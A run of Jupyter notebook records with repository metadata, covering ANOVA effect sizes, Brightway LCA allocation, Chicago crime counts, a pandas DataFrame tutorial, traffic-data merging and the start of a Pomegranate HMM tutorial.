aov['omega_sq'] = 'NaN'\n aov['omega_sq'] = (aov[:-1]['sum_sq']-(aov[:-1]['df']*mse))/(sum(aov['sum_sq'])+mse)\n return aov\n \n \neta_squared(aov_table1)\nomega_squared(aov_table1)\nprint(aov_table1)", "_____no_output_____" ] ], [ [ "### Comentários\n\nOs resultados da variável dose tem a maior distância do valor médio (sum_sq) e portanto a maior variância relatica (F-Score). Isto pode ser comprovado pelo Eta-Squared e Omega-Squared (definição abaixo).\n\n### Mais sobre Eta-Squared e Omega-Squared\n\nOutro conjunto de medidas de tamanho de efeito para variáveis independentes categóricas tem uma interpretação mais intuitiva e é mais fácil de avaliar. Eles incluem o Eta Squared, o Parcial Eta Squared e o Omega Squared. Como a estatística R Squared, todos eles têm a interpretação intuitiva da proporção da variância contabilizada.\n\nEta Squared é calculado da mesma forma que R Squared, e tem a interpretação mais equivalente: da variação total em Y, a proporção que pode ser atribuída a um X específico.\n\nO Eta Squared, no entanto, é usado especificamente em modelos ANOVA. Cada efeito categórico no modelo tem seu próprio Eta Squared, de modo que você obtenha uma medida específica e intuitiva do efeito dessa variável.\n\nA desvantagem do Eta Squared é que é uma medida tendenciosa da variância da população explicada (embora seja exata para a amostra), sempre superestima.\n\nEsse viés fica muito pequeno à medida que o tamanho da amostra aumenta, mas para amostras pequenas, uma medida de tamanho de efeito imparcial é Omega Squared. Omega Squared tem a mesma interpretação básica, mas usa medidas imparciais dos componentes de variância. Por ser uma estimativa imparcial das variâncias populacionais, o Omega Squared é sempre menor que o Eta Squared (ES).\n\nNão há padrões acordados sobre como interpretar um ES. A interpretação é basicamente subjetiva. Melhor abordagem é comparar com outros estudos.\n\nCohen (1977):\n- 0.2 = pequeno\n- 0.5 = moderado\n- 0.8 = grande", "_____no_output_____" ], [ "## ANOVA com Statsmodels", "_____no_output_____" ] ], [ [ "formula = 'len ~ C(supp) + C(dose) + C(supp):C(dose)'\nmodel = ols(formula, data).fit()\naov_table = anova_lm(model, typ=2)\n\neta_squared(aov_table)\nomega_squared(aov_table)\nprint(aov_table)", "_____no_output_____" ] ], [ [ "## Quantile-Quantile (QQplot)", "_____no_output_____" ] ], [ [ "res = model.resid \nfig = sm.qqplot(res, line='s')\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1db049dc50e12a5daa1cd162854aad3d59c49d
17,740
ipynb
Jupyter Notebook
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
1
2021-02-22T11:57:43.000Z
2021-02-22T11:57:43.000Z
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
5
2021-05-27T13:08:42.000Z
2021-11-01T20:52:55.000Z
dev/Multifunctionality with Brightway 2.5.ipynb
mixib/matrix_utils
6e59f4179980d705face350d839ca4bd951e3c3c
[ "BSD-3-Clause" ]
2
2021-06-14T09:04:08.000Z
2021-09-17T12:30:36.000Z
31.906475
1,065
0.488839
[ [ [ "# Import development libraries", "_____no_output_____" ] ], [ [ "import bw2data as bd\nimport bw2calc as bc\nimport bw_processing as bwp\nimport numpy as np\nimport matrix_utils as mu", "_____no_output_____" ] ], [ [ "# Create new project", "_____no_output_____" ] ], [ [ "bd.projects.set_current(\"Multifunctionality\")", "_____no_output_____" ] ], [ [ "Our existing implementation allows us to distinguish activities and prodducts, though not everyone does this.", "_____no_output_____" ] ], [ [ "db = bd.Database(\"background\")\ndb.write({\n (\"background\", \"1\"): {\n \"type\": \"process\",\n \"name\": \"1\",\n \"exchanges\": [{\n \"input\": (\"background\", \"bio\"),\n \"amount\": 1,\n \"type\": \"biosphere\",\n }]\n }, \n (\"background\", \"2\"): {\n \"type\": \"process\",\n \"name\": \"2\",\n \"exchanges\": [{\n \"input\": (\"background\", \"bio\"),\n \"amount\": 10,\n \"type\": \"biosphere\",\n }]\n },\n (\"background\", \"bio\"): {\n \"type\": \"biosphere\",\n \"name\": \"bio\",\n \"exchanges\": [],\n },\n (\"background\", \"3\"): {\n \"type\": \"process\",\n \"name\": \"2\",\n \"exchanges\": [\n {\n \"input\": (\"background\", \"1\"),\n \"amount\": 2,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"2\"),\n \"amount\": 4,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"4\"),\n \"amount\": 1,\n \"type\": \"production\",\n \n }\n ]\n },\n (\"background\", \"4\"): {\n \"type\": \"product\",\n }\n})", "Writing activities to SQLite3 database:\n0% [#####] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:00\n" ], [ "method = bd.Method((\"something\",))\nmethod.write([((\"background\", \"bio\"), 1)])", "_____no_output_____" ] ], [ [ "# LCA of background system\n\nThis database is fine and normal. It work the way we expect.\n\nHere we use the preferred calling convention for Brightway 2.5, with the convenience function `prepare_lca_inputs`.", "_____no_output_____" ] ], [ [ "fu, data_objs, _ = bd.prepare_lca_inputs(demand={(\"background\", \"4\"): 1}, method=(\"something\",))", "_____no_output_____" ], [ "lca = bc.LCA(fu, data_objs=data_objs)\nlca.lci()\nlca.lcia()\nlca.score", "_____no_output_____" ] ], [ [ "# Multifunctional activities\n\nWhat happens when we have an activity that produces multiple products?", "_____no_output_____" ] ], [ [ "db = bd.Database(\"example mf\")\ndb.write({\n # Activity\n (\"example mf\", \"1\"): {\n \"type\": \"process\",\n \"name\": \"mf 1\",\n \"exchanges\": [\n {\n \"input\": (\"example mf\", \"2\"),\n \"amount\": 2,\n \"type\": \"production\",\n }, {\n \"input\": (\"example mf\", \"3\"),\n \"amount\": 4,\n \"type\": \"production\",\n },\n {\n \"input\": (\"background\", \"1\"),\n \"amount\": 2,\n \"type\": \"technosphere\",\n }, {\n \"input\": (\"background\", \"2\"),\n \"amount\": 4,\n \"type\": \"technosphere\",\n }\n ]\n },\n # Product\n (\"example mf\", \"2\"): {\n \"type\": \"good\",\n \"price\": 4\n },\n # Product\n (\"example mf\", \"3\"): {\n \"type\": \"good\",\n \"price\": 6\n }\n})", "Writing activities to SQLite3 database:\n0% [###] 100% | ETA: 00:00:00\nTotal time elapsed: 00:00:00\n" ] ], [ [ "We can do an LCA of one of the products, but we will get a warning about a non-square matrix:", "_____no_output_____" ] ], [ [ "fu, data_objs, _ = bd.prepare_lca_inputs(demand={(\"example mf\", \"1\"): 1}, method=(\"something\",))", "_____no_output_____" ], [ "lca = bc.LCA(fu, data_objs=data_objs)\nlca.lci()", "_____no_output_____" ] ], [ [ "If we look at the technosphere matrix, we can see our background 
database (upper left quadrant), and the two production exchanges in the lower right:", "_____no_output_____" ] ], [ [ "lca.technosphere_matrix.toarray()", "_____no_output_____" ] ], [ [ "# Handling multifunctionality\n\nThere are many ways to do this. This notebook is an illustration of how such approaches can be madde easier using the helper libraries [bw_processing](https://github.com/brightway-lca/bw_processing) and [matrix_utils](https://github.com/brightway-lca/matrix_utils), not a statement that one approach is better (or even correct).\n\nWe create a new, in-memory \"delta\" `bw_processing` data package that gives new values for some additional columns in the matrix (the virtual activities generated by allocating each product), as well as updating values in the existing matrix.", "_____no_output_____" ] ], [ [ "def economic_allocation(dataset):\n assert isinstance(dataset, bd.backends.Activity)\n \n # Split exchanges into functional and non-functional\n functions = [exc for exc in dataset.exchanges() if exc.input.get('type') in {'good', 'waste'}]\n others = [exc for exc in dataset.exchanges() if exc.input.get('type') not in {'good', 'waste'}]\n \n for exc in functions:\n assert exc.input.get(\"price\") is not None\n\n total_value = sum([exc.input['price'] * exc['amount'] for exc in functions])\n \n # Plus one because need to add (missing) production exchanges\n n = len(functions) * (len(others) + 1) + 1\n data = np.zeros(n)\n indices = np.zeros(n, dtype=bwp.INDICES_DTYPE)\n flip = np.zeros(n, dtype=bool)\n \n for i, f in enumerate(functions):\n allocation_factor = f['amount'] * f.input['price'] / total_value\n col = bd.get_id(f.input)\n \n # Add explicit production\n data[i * (len(others) + 1)] = f['amount']\n indices[i * (len(others) + 1)] = (col, col)\n\n for j, o in enumerate(others):\n index = i * (len(others) + 1) + j + 1\n data[index] = o['amount'] * allocation_factor\n flip[index] = o['type'] in {'technosphere', 'generic consumption'}\n indices[index] = (bd.get_id(o.input), col)\n\n # Add implicit production of allocated dataset\n data[-1] = 1\n indices[-1] = (dataset.id, dataset.id)\n \n # Note: This assumes everything is in technosphere, a real function would also\n # patch the biosphere\n allocated = bwp.create_datapackage(sum_intra_duplicates=True, sum_inter_duplicates=False)\n allocated.add_persistent_vector(\n matrix=\"technosphere_matrix\",\n indices_array=indices,\n flip_array=flip,\n data_array=data,\n name=f\"Allocated version of {dataset}\",\n )\n return allocated", "_____no_output_____" ], [ "dp = economic_allocation(bd.get_activity((\"example mf\", \"1\")))", "_____no_output_____" ], [ "lca = bc.LCA({bd.get_id((\"example mf\", \"2\")): 1}, data_objs=data_objs + [dp])", "_____no_output_____" ], [ "lca.lci()", "_____no_output_____" ] ], [ [ "Note that the last two columns, when summed together, form the unallocated activity (column 4):", "_____no_output_____" ] ], [ [ "lca.technosphere_matrix.toarray()", "_____no_output_____" ] ], [ [ "To make sure what we have done is clear, we can create the matrix just for the \"delta\" data package:", "_____no_output_____" ] ], [ [ "mu.MappedMatrix(packages=[dp], matrix=\"technosphere_matrix\").matrix.toarray()", "_____no_output_____" ] ], [ [ "And we can now do LCAs of both allocated products:", "_____no_output_____" ] ], [ [ "lca.lcia()\nlca.score", "_____no_output_____" ], [ "lca = bc.LCA({bd.get_id((\"example mf\", \"3\")): 1}, data_objs=data_objs + [dp])\nlca.lci()\nlca.lcia()\nlca.score", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1dbc9983635df74c08c41898d452368483b353
187,947
ipynb
Jupyter Notebook
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
null
null
null
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
null
null
null
jupyter_notebooks/Crime Data.ipynb
jessicagtz/Project-2-Chicago-Communities
2baad98c537d1f0e1a3a3abdfe83d3aacd81ae1c
[ "MIT" ]
2
2018-06-19T15:06:53.000Z
2018-06-30T18:08:17.000Z
43.476058
143
0.336217
[ [ [ "import pandas as pd\nimport numpy as np", "_____no_output_____" ], [ "crimes = pd.read_csv(\"Crimes_-_2001_to_present.csv\")\ncrimes", "_____no_output_____" ] ], [ [ "# Reported crimes per Community Area by Primary Type ", "_____no_output_____" ] ], [ [ "crime_org= pd.DataFrame(crimes.pivot_table(crimes,index=[\"Community Area\", \"Primary Type\"]))\ncrime_org", "_____no_output_____" ], [ "\ncrime_data = pd.DataFrame(crimes.pivot_table(values=[\"ID\"], index=[\"Community Area\", \"Primary Type\", \"Date\"], aggfunc=np.sum))\ncrime_data", "_____no_output_____" ] ], [ [ "# Number of Reported Crimes per Commuity Area ", "_____no_output_____" ] ], [ [ "#1) group by community area\n#2) get numbers of crime type per community area\n\ncrime_area= pd.DataFrame(crimes.groupby(\"Community Area\")[\"ID\"].count())\ncrime_area", "_____no_output_____" ] ], [ [ "# Number of Reported Crimes per Primary Type", "_____no_output_____" ] ], [ [ "crime_type= pd.DataFrame(crimes.groupby(\"Primary Type\")[\"ID\"].count())\ncrime_type", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1dc94e2730a2345fb4ded78fbd2a1fab7ca33f
64,376
ipynb
Jupyter Notebook
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/02-DataFrames.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
2
2020-08-14T13:42:03.000Z
2020-08-19T20:32:29.000Z
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/02-DataFrames.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
9
2020-09-25T21:54:00.000Z
2022-02-10T01:39:05.000Z
FINAL-TF2-FILES/TF_2_Notebooks_and_Data/01-Pandas-Crash-Course/.ipynb_checkpoints/02-DataFrames-checkpoint.ipynb
tanuja333/Tensorflow_Keras
e29464da56666c675667b491b12d625ffaefddd9
[ "Apache-2.0" ]
null
null
null
24.17424
236
0.314838
[ [ [ "___\n\n<a href='http://www.pieriandata.com'><img src='../Pierian_Data_Logo.png'/></a>\n___\n<center><em>Copyright Pierian Data</em></center>\n<center><em>For more information, visit us at <a href='http://www.pieriandata.com'>www.pieriandata.com</a></em></center>", "_____no_output_____" ], [ "# DataFrames\n\nDataFrames are the workhorse of pandas and are directly inspired by the R programming language. We can think of a DataFrame as a bunch of Series objects put together to share the same index. Let's use pandas to explore this topic!", "_____no_output_____" ] ], [ [ "import pandas as pd\nimport numpy as np\nfrom numpy.random import randint", "_____no_output_____" ], [ "columns= ['W', 'X', 'Y', 'Z'] # four columns\nindex= ['A', 'B', 'C', 'D', 'E'] # five rows", "_____no_output_____" ], [ "np.random.seed(42)\ndata = randint(-100,100,(5,4))", "_____no_output_____" ], [ "data", "_____no_output_____" ], [ "df = pd.DataFrame(data,index,columns)", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "# Selection and Indexing\n\nLet's learn the various methods to grab data from a DataFrame\n\n# COLUMNS\n\n## Grab a single column", "_____no_output_____" ] ], [ [ "df['W']", "_____no_output_____" ] ], [ [ "## Grab multiple columns", "_____no_output_____" ] ], [ [ "# Pass a list of column names\ndf[['W','Z']]", "_____no_output_____" ] ], [ [ "### DataFrame Columns are just Series ", "_____no_output_____" ] ], [ [ "type(df['W'])", "_____no_output_____" ] ], [ [ "### Creating a new column:", "_____no_output_____" ] ], [ [ "df['new'] = df['W'] + df['Y']", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## Removing Columns", "_____no_output_____" ] ], [ [ "# axis=1 because its a column\ndf.drop('new',axis=1)", "_____no_output_____" ], [ "# Not inplace unless reassigned!\ndf", "_____no_output_____" ], [ "df = df.drop('new',axis=1)", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## Working with Rows", "_____no_output_____" ], [ "## Selecting one row by name", "_____no_output_____" ] ], [ [ "df.loc['A']", "_____no_output_____" ] ], [ [ "## Selecting multiple rows by name", "_____no_output_____" ] ], [ [ "df.loc[['A','C']]", "_____no_output_____" ] ], [ [ "## Select single row by integer index location", "_____no_output_____" ] ], [ [ "df.iloc[0]", "_____no_output_____" ] ], [ [ "## Select multiple rows by integer index location", "_____no_output_____" ] ], [ [ "df.iloc[0:2]", "_____no_output_____" ] ], [ [ "## Remove row by name", "_____no_output_____" ] ], [ [ "df.drop('C',axis=0)", "_____no_output_____" ], [ "# NOT IN PLACE!\ndf ", "_____no_output_____" ] ], [ [ "### Selecting subset of rows and columns at same time", "_____no_output_____" ] ], [ [ "df.loc[['A','C'],['W','Y']]", "_____no_output_____" ] ], [ [ "# Conditional Selection\n\nAn important feature of pandas is conditional selection using bracket notation, very similar to numpy:", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "df>0", "_____no_output_____" ], [ "df[df>0]", "_____no_output_____" ], [ "df['X']>0", "_____no_output_____" ], [ "df[df['X']>0]", "_____no_output_____" ], [ "df[df['X']>0]['Y']", "_____no_output_____" ], [ "df[df['X']>0][['Y','Z']]", "_____no_output_____" ] ], [ [ "For two conditions you can use | and & with parenthesis:", "_____no_output_____" ] ], [ [ "df[(df['W']>0) & (df['Y'] > 1)]", "_____no_output_____" ] ], [ [ "## More Index Details\n\nLet's discuss some more features of indexing, including resetting the index or setting it something else. 
We'll also talk about index hierarchy!", "_____no_output_____" ] ], [ [ "df", "_____no_output_____" ], [ "# Reset to default 0,1...n index\ndf.reset_index()", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "newind = 'CA NY WY OR CO'.split()", "_____no_output_____" ], [ "newind", "_____no_output_____" ], [ "df['States'] = newind", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "df.set_index('States')", "_____no_output_____" ], [ "df", "_____no_output_____" ], [ "df = df.set_index('States')", "_____no_output_____" ], [ "df", "_____no_output_____" ] ], [ [ "## DataFrame Summaries\nThere are a couple of ways to obtain summary data on DataFrames.<br>\n<tt><strong>df.describe()</strong></tt> provides summary statistics on all numerical columns.<br>\n<tt><strong>df.info and df.dtypes</strong></tt> displays the data type of all columns.", "_____no_output_____" ] ], [ [ "df.describe()", "_____no_output_____" ], [ "df.dtypes", "_____no_output_____" ], [ "df.info()", "<class 'pandas.core.frame.DataFrame'>\nIndex: 5 entries, CA to CO\nData columns (total 4 columns):\nW 5 non-null int32\nX 5 non-null int32\nY 5 non-null int32\nZ 5 non-null int32\ndtypes: int32(4)\nmemory usage: 120.0+ bytes\n" ] ], [ [ "# Great Job!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ] ]
cb1de0a73303e2de68ac968606756d7ef7552dcc
152,662
ipynb
Jupyter Notebook
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
8
2019-07-03T13:40:00.000Z
2020-12-28T07:38:02.000Z
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
5
2020-03-24T17:36:12.000Z
2021-12-13T20:11:48.000Z
notebooks/07_exploring_external_data.ipynb
vtoliveira/ey-nextwave-competition
bedd29f124cf07e1f953a37791b1f2475532399b
[ "MIT" ]
5
2019-07-03T13:40:01.000Z
2020-10-28T23:44:16.000Z
115.303625
80,952
0.795732
[ [ [ "# general tools\nimport warnings\nimport requests\nimport pickle\nimport math\nimport re\n\n# visualization tools\nimport matplotlib.pyplot as plt\nfrom tqdm.auto import tqdm\nimport seaborn as sns\n\n# data preprocessing tools\nimport pandas as pd\nfrom shapely.geometry import Point\nimport numpy as np\nfrom scipy.spatial.distance import cdist\n\n\ntqdm.pandas()\nplt.style.use('seaborn')\nwarnings.filterwarnings(\"ignore\")\n\n%run ../src/utils.py", "_____no_output_____" ], [ "traffic = pd.read_csv('../data/external/Traffic_Published_2016.csv')\ntraffic.shape", "_____no_output_____" ], [ "traffic.info()", "<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 94258 entries, 0 to 94257\nData columns (total 16 columns):\nROUTE_ID 94258 non-null object\nFROM_MILEPOINT 94258 non-null float64\nTO_MILEPOINT 94258 non-null float64\nCOUNTY_COD 91713 non-null float64\nCOUNTY_NAME 91713 non-null object\nTC_NUMBER 41239 non-null object\nAADT 94258 non-null int64\nAADT_SINGLE_UNIT 44070 non-null float64\nPCT_PEAK_SINGLE 42724 non-null float64\nAADT_COMBINATION 43403 non-null float64\nPCT_PEAK_COMBINATION 37597 non-null float64\nK_FACTOR 83781 non-null float64\nD_Factor 41095 non-null float64\nFUTURE_AADT 94239 non-null float64\nLat 40984 non-null float64\nLong 40984 non-null float64\ndtypes: float64(12), int64(1), object(3)\nmemory usage: 11.5+ MB\n" ], [ "traffic = traffic.dropna(subset=['Lat'])\ntraffic.shape", "_____no_output_____" ], [ "train = pd.read_csv('../data/raw/data_train.zip', index_col='Unnamed: 0', low_memory=True)\ntest = pd.read_csv('../data/raw/data_test.zip', index_col='Unnamed: 0', low_memory=True)\n\ntrain.shape, test.shape", "_____no_output_____" ], [ "data = pd.concat([train, test], axis=0)\n\ndata.shape", "_____no_output_____" ], [ "import pyproj\n\nconverter = pyproj.Proj(\"+proj=merc +lat_ts=0 +lat_0=0 +lon_0=0 +x_0=0 \\\n +y_0=0 +ellps=WGS84 +datum=WGS84 +units=m +no_defs\")\n\ndata['lat_lon_entry'] = [converter(x, y, inverse=True) for x, y in zip(data.x_entry, data.y_entry)]\n\ndata['lat_entry'] = data.lat_lon_entry.apply(lambda row: row[0])\ndata['lon_entry'] = data.lat_lon_entry.apply(lambda row: row[1])\n\ndata['lat_lon_exit'] = [converter(x, y, inverse=True) for x, y in zip(data.x_exit, data.y_exit)]\n\ndata['lat_exit'] = data.lat_lon_exit.apply(lambda row: row[0])\ndata['lon_exit'] = data.lat_lon_exit.apply(lambda row: row[1])", "_____no_output_____" ], [ "data['euclidean_distance'] = euclidean(data.x_entry.values, data.y_entry.values,\n data.x_exit.values, data.y_exit.values)", "_____no_output_____" ], [ "from math import hypot\nfrom scipy.spatial.distance import cdist\nfrom tqdm import tqdm\n\ntraffic = traffic.reset_index(drop=True)\ncoords_traff = list(zip(traffic.Lat.values, traffic.Long.values))\ndata['idx_traffic'] = np.zeros(data.shape[0])\n\ndf_copy = data.copy()\ndf_copy = df_copy[df_copy.euclidean_distance!=0]\ndf_copy = df_copy.reset_index(drop=True)\n\ndef minimum_distance(data, row_type='entry'):\n for idx, (lat, long) in tqdm(enumerate(list(zip(data['lat_'+row_type].values, data['lon_'+row_type].values)))):\n minimum_dist = 0\n\n idx_traffic = cdist([(lat, long)], coords_traff).argmin()\n data.loc[idx, 'idx_traffic'] = idx_traffic\n \n return data\n\ndf_copy = minimum_distance(df_copy, row_type='exit')", "491966it [1:40:30, 81.58it/s]\n" ], [ "df_copy['idx_traffic'] = df_copy.idx_traffic.astype(int)", "_____no_output_____" ], [ "df_copy.head(4)", "_____no_output_____" ], [ "traffic_cols = traffic.columns.tolist()\n\ntraffic = 
traffic.reset_index(drop=False)\n#traffic.columns = ['idx_traffic']+[traffic_cols]\n\ndf_copy['index'] = df_copy.idx_traffic.values\n\ndf_final = df_copy.merge(traffic, on='index')\ndf_final.head(4)", "_____no_output_____" ], [ "final_columns = list(set(traffic.columns.tolist()) - set(['level_0', 'index']))\nfinal_columns += ['hash', 'trajectory_id']\n\nfor col in final_columns:\n if col not in ['hash', 'trajectory_id']:\n df_final = df_final.rename(index=str, columns={col: col+'_exit'})\n\ndf_final.head(4)", "_____no_output_____" ], [ "final_columns = ['hash', 'trajectory_id'] + [col+'_exit' for col in final_columns if col not in ['hash', 'trajectory_id']]", "_____no_output_____" ], [ "df_final[final_columns].head(4)\n\ndf_final = df_final.drop('COUNTY_NAME_exit', axis=1)", "_____no_output_____" ], [ "final_columns = list(set(final_columns) - set(['COUNTY_NAME_exit']))", "_____no_output_____" ], [ "df_final[final_columns].to_hdf('../data/external/traffic_exit_features.hdf', key='exit', mode='w')", "_____no_output_____" ] ], [ [ "From this point, we will perform a round of exploration and visualization regarding the newfound external data.", "_____no_output_____" ] ], [ [ "traffic_exit = pd.read_hdf('../data/raw/traffic_exit_features.hdf', key='exit', mode='r')\ntraffic_entry = pd.read_hdf('../data/raw/traffic_entry_features.hdf', key='entry', mode='r')\n\ntraffic_entry.shape, traffic_exit.shape", "_____no_output_____" ], [ "traffic_entry.head(4).T", "_____no_output_____" ] ], [ [ "- AADT: Annual Average Daily Traffic (AADT), is the total volume of vehicle traffic. of a roadway for a year divided by 365 days.\n- K_FACTOR: is defined as the proportion of annual average daily traffic occurring in an hour. This factor is used for designing and analyzing the flow of traffic on highways.\n- ROUTE_ID: Integer value representing each road on Georgia Federative's roads.", "_____no_output_____" ] ], [ [ "29.8% red, 74.1% green and 74.9% blue", "_____no_output_____" ], [ "fig, ax = plt.subplots(2, 1, figsize=(18, 15))\n\nsns.set_style(\"whitegrid\")\nsns.distplot(traffic_entry.AADT_entry.dropna().values, \n kde=False, \n hist_kws={\"linewidth\": 3, \n \"alpha\": 1, \n \"color\": \"coral\"},\n ax=ax[0])\n\nsns.distplot(traffic_entry.K_FACTOR_entry.dropna().values, \n kde=False, \n hist_kws={\"linewidth\": 3, \n \"alpha\": 1, \n \"color\": [(0.298, 0.741, 0.749)]},\n ax=ax[1])\n\nax[0].set_title('Annual Average Daily Traffic Distribution', fontsize=30)\nax[1].set_title('K-Factor: Proportion of annual average daily traffic occurring in an hour',\n fontsize=30)\n\nax[0].set_xlim(0, 150000)\nax[1].set_xlim(0, 25)\n\nax[0].grid(False)\nax[1].grid(False)\n\nax[0].tick_params(axis='both', which='major', labelsize=20)\nax[1].tick_params(axis='both', which='major', labelsize=20)", "_____no_output_____" ], [ "traffic_entry.AADT_entry.hist(bins=100)", "_____no_output_____" ], [ "traffic_entry.K_FACTOR_entry.hist(bins=100)", "_____no_output_____" ], [ "sns.countplot(x='ROUTE_ID_entry', data=traffic_entry)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1de28768813eea1375ca37d524f45f40230121
2,836
ipynb
Jupyter Notebook
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
example/MyM4.ipynb
nufeng1999/jupyter-MyM4-kernel
c5e7c505a08c954c835e88cb334296d42e63b7f7
[ "MIT" ]
null
null
null
20.70073
329
0.482722
[ [ [ "empty" ] ] ]
[ "empty" ]
[ [ "empty" ] ]
cb1de601a2f92acba37b97730d147784cb26ed37
36,200
ipynb
Jupyter Notebook
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
HMM warmup (optional).ipynb
umeshpai/parts_of_speech_tagging
19c0ef53aae9a285554b245b5ecbe2c4604b729e
[ "MIT" ]
null
null
null
73.427992
13,044
0.74721
[ [ [ "# Intro to Hidden Markov Models (optional)\n---\n### Introduction\n\nIn this notebook, you'll use the [Pomegranate](http://pomegranate.readthedocs.io/en/latest/index.html) library to build a simple Hidden Markov Model and explore the Pomegranate API.\n\n<div class=\"alert alert-block alert-info\">\n**Note:** You are not required to complete this notebook and it will not be submitted with your project, but it is designed to quickly introduce the relevant parts of the Pomegranate library that you will need to complete the part of speech tagger.\n</div>\n\nThe notebook already contains some code to get you started. You only need to add some new functionality in the areas indicated; you will not need to modify the included code beyond what is requested. Sections that begin with **'IMPLEMENTATION'** in the header indicate that you need to fill in code in the block that follows. Instructions will be provided for each section, and the specifics of the implementation are marked in the code block with a 'TODO' statement. Please be sure to read the instructions carefully!\n\n<div class=\"alert alert-block alert-info\">\n**Note:** Code and Markdown cells can be executed using the `Shift + Enter` keyboard shortcut. Markdown cells can be edited by double-clicking the cell to enter edit mode.\n</div>\n<hr>", "_____no_output_____" ], [ "<div class=\"alert alert-block alert-warning\">\n**Note:** Make sure you have selected a **Python 3** kernel in Workspaces or the hmm-tagger conda environment if you are running the Jupyter server on your own machine.\n</div>", "_____no_output_____" ] ], [ [ "# Jupyter \"magic methods\" -- only need to be run once per kernel restart\n%load_ext autoreload\n%aimport helpers\n%autoreload 1", "_____no_output_____" ], [ "# import python modules -- this cell needs to be run again if you make changes to any of the files\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom helpers import show_model\nfrom pomegranate import State, HiddenMarkovModel, DiscreteDistribution", "_____no_output_____" ] ], [ [ "## Build a Simple HMM\n---\nYou will start by building a simple HMM network based on an example from the 